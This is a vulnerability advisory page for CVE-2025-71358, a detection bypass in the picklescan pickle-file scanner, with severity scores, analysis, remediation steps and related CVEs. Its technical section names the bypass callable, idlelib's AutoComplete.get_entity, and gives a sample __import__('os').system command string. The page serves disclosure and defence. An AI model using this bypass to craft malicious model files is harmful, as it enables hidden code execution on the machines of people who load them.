Which versions of picklescan are affected by CVE-2025-71358?

picklescan versions before 0.0.29 contain a detection bypass allowing attackers to hide arbitrary code execution in pickle files (PyTorch models, scikit-learn checkpoints) that appear safe after…. A patch is available.

How to fix or mitigate CVE-2025-71358?

Within 24 hours: Publicly available exploit code exists-immediately audit all systems using picklescan and enumerate all pickle file sources, prioritizing external model inputs. Within 7 days: Restrict pickle deserialization to digitally-signed, internally-controlled models only; enable audit logging on pickle.load() calls. Within 30 days: Evaluate migration to safer serialization formats (ONNX, SafeTensors, JSON) and monitor vendor advisories for patches.

picklescan CVE-2025-71358

Q: What is the CVSS score of CVE-2025-71358?

CVE-2025-71358 has a CVSS 4.0 base score of 7.6 (High). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X.

EUVD-2025-210303 HIGH

Deserialization of Untrusted Data (CWE-502)

2026-06-22 VulnCheck

Deserialization Picklescan

7.6

CVSS 4.0 · Vendor: VulnCheck

Severity by source

Vendor (VulnCheck) PRIMARY

7.6 HIGH

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

vuln.today AI

8.8 HIGH

Network-delivered malicious file (AV:N), reliable bypass once crafted (AC:L), no auth (PR:N), victim must load the file (UI:R), full code execution as user yields C/I/A:H.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

4.0 AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Scope

Lifecycle Timeline

Patch available

Jun 22, 2026 - 23:02 EUVD

Source Code Evidence Fetched

Jun 22, 2026 - 22:16 vuln.today

Analysis Generated

Jun 22, 2026 - 22:16 vuln.today

DescriptionCVE.org

picklescan before 0.0.29 fails to detect malicious pickle files that exploit idlelib.autocomplete.AutoComplete.get_entity function in reduce methods. Attackers can embed undetected code in pickle files that executes arbitrary commands when loaded by victims using pickle.load().

AnalysisAI

Detection bypass in picklescan before 0.0.29 allows attackers to smuggle arbitrary code execution payloads through pickle files by abusing the idlelib.autocomplete.AutoComplete.get_entity function inside __reduce__ methods. Because picklescan does not flag this function as dangerous, malicious ML model files (e.g., PyTorch checkpoints) appear safe to scan but execute attacker commands the moment a victim calls pickle.load(). Publicly available exploit code exists in the GHSA advisory, but no public exploit identified at time of analysis in CISA KEV.

Technical ContextAI

picklescan is a Python scanner designed to identify dangerous opcodes and callables within pickle streams, primarily used to vet PyTorch and other ML model files before deserialization. The vulnerability is a classic CWE-502 (Deserialization of Untrusted Data) bypass: pickle's __reduce__ protocol allows a class to specify any callable to invoke at load time, and picklescan maintains an allow/deny list of callables it considers dangerous. The Python standard library's idlelib.autocomplete.AutoComplete.get_entity ultimately resolves to eval()-like behavior on an attacker-controlled string, but it was absent from picklescan's denylist, so a payload chaining it with a string like "__import__('os').system('whoami')" passes scanning and detonates on pickle.load().

RemediationAI

Vendor-released patch: upgrade picklescan to 0.0.29 or later (pip install --upgrade picklescan>=0.0.29), which adds idlelib.autocomplete.AutoComplete.get_entity to the dangerous-callables list per commit aecd11be98702caa9ba9b12189d91ad596a36114. Consult the advisory at https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6w4w-5w54-rjvr for details. If immediate upgrade is not possible, treat all unverified pickle/PyTorch files as untrusted and load them only with safer alternatives - prefer safetensors for model weights, use torch.load(..., weights_only=True) on PyTorch >=2.4 (rejects arbitrary callables but breaks models that rely on custom classes), or run pickle.load in a sandboxed/ephemeral container with no network and no secrets (adds operational complexity and latency). As a stopgap, you can extend picklescan's denylist with idlelib.autocomplete.AutoComplete.get_entity locally, accepting that other unknown bypass primitives may still exist.

More from same product – last 7 days

CVE-2026-3490 CRITICAL Act Now

10.0 Jun 17

Remote code execution against users of picklescan versions prior to 1.0.4 is achievable by smuggling any blocked functio

CVE-2025-71320 CRITICAL Act Now

9.3 Jun 17

Arbitrary code execution in picklescan before 0.0.33 allows remote attackers to bypass the scanner's malicious-pickle de

CVE-2025-71321 CRITICAL Act Now

9.3 Jun 17

Arbitrary file write in picklescan before 0.0.33 lets attackers bypass the tool's dangerous-call blocklist by abusing di

CVE-2025-71323 CRITICAL Act Now

9.3 Jun 17

Remote code execution in picklescan before 0.0.33 enables attackers to bypass the tool's malicious-pickle detection by s

CVE-2025-71325 CRITICAL Act Now

9.3 Jun 17

Detection bypass in picklescan versions prior to 0.0.27 allows attackers to smuggle malicious Python pickle files past t

CVE-2025-71358 vulnerability details – vuln.today

Back

picklescan CVE-2025-71358

Severity by source

CVSS VectorVendor: VulnCheck

Lifecycle Timeline

DescriptionCVE.org

AnalysisAI

Technical ContextAI

RemediationAI

More from same product – last 7 days

Share

External POC / Exploit Code